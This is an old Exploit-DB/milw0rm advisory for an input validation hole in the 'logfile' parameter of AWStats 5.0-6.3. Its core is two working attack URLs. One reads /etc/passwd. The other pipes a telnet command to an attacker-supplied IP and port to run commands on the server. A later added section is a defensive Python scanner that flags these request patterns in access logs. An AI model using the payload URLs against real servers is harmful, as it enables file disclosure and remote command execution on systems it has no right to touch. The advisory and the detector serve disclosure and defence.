AWStats (5.0-6.3) Input Validation Hole in 'logfile'



EDB-ID: 407 CVE: N/A OSVDB-ID: 9109
Author: Johnathan Bat Published: 2004-08-21 Verified: Verified
Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>
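A defender-side check for the two request shapes shown above, as an added example that is not part of the original advisory: it scans web-server access logs for awstats.pl requests whose logfile parameter carries a filesystem path, a pipe character, or appears more than once. The log lines, client addresses and the COMMAND placeholder are constructed, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation addresses, placeholder command).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Aug/2004:10:00:01 +0000] "GET /cgi-bin/awstats.pl?config=example.org&framename=main HTTP/1.1" 200 5120 "-" "-"
192.0.2.66 - - [21/Aug/2004:10:02:13 +0000] "GET /cgi-bin/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=example.org&framename=main&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.1" 200 1830 "-" "-"
192.0.2.66 - - [21/Aug/2004:10:03:40 +0000] "GET /cgi-bin/awstats.pl?config=example.org&pluginmode=rawlog&logfile=&logfile=%7CCOMMAND HTTP/1.1" 200 412 "-" "-"
198.51.100.7 - - [21/Aug/2004:10:05:00 +0000] "GET /index.html?logfile=/etc/passwd HTTP/1.1" 200 900 "-" "-"
"""

# Client address and request target from a combined-format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(values):
    """Return the reasons a list of decoded logfile values looks suspicious."""
    reasons = []
    if len(values) > 1:
        reasons.append("repeated logfile parameter")
    for value in values:
        if "|" in value:
            reasons.append("pipe character in value")
        elif value.startswith("/") or ".." in value:
            reasons.append("filesystem path supplied by client")
    return reasons

def scan(log_text):
    """Return (client, logfile values, reasons) for each suspicious awstats.pl hit."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("awstats.pl"):
            continue  # the parameter only matters on the AWStats CGI
        # parse_qs percent-decodes, so %7C is seen as "|"; keep blank values
        # so that "logfile=&logfile=..." still counts as repeated.
        values = parse_qs(url.query, keep_blank_values=True).get("logfile", [])
        reasons = classify(values)
        if reasons:
            hits.append((client, values, reasons))
    return hits

if __name__ == "__main__":
    for client, values, reasons in scan(SAMPLE_LOG):
        print(client, values, "; ".join(reasons))
```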


# milw0rm.com [2004-08-21]